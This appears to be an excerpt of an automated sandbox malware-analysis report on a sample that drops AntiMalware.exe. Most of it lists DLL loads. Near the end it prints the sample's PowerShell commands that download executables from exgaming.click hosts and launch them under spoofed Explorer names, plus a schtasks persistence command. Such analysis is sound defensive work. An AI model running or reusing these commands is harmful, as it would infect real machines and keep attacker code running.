Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptnet.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cabinet.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: devenum.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: devobj.dll
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: msdmo.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: ZzOTKK2V8l.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: ZzOTKK2V8l.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: ZzOTKK2V8l.exe, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: AntiMalware.exe.0.dr, ClientSocket.cs | .Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Code function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Code function: 13_2_00007FF848F300BD pushad ; iretd 13_2_00007FF848F300C1
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Code function: 18_2_00007FF848F100BD pushad ; iretd 18_2_00007FF848F100C1

                            Persistence and Installation Behavior

                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | File created: C:\Users\user\AppData\Roaming\AntiMalware.exe

                            Boot Survival

                            Source: Yara match | File source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara match | File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Source: Yara match | File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
